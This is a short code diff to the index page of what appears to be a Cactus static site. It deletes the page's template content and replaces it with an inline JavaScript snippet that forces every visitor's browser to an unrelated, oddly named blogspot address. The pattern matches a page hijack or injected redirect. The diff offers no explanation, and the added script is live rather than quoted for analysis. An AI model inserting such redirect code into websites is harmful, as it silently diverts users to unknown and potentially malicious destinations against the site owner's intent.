--- a/pages/index.html
+++ b/pages/index.html
@@ -1,4 +1,2 @@
-{% extends "base.html" %}
-{% block content %}
-Welcome to Cactus!
-{% endblock %}
+<script language='javascript' type='text/javascript'>
+window.location ="http://dofaalmntwfaa.blogspot.be/search/label/u5";</script>
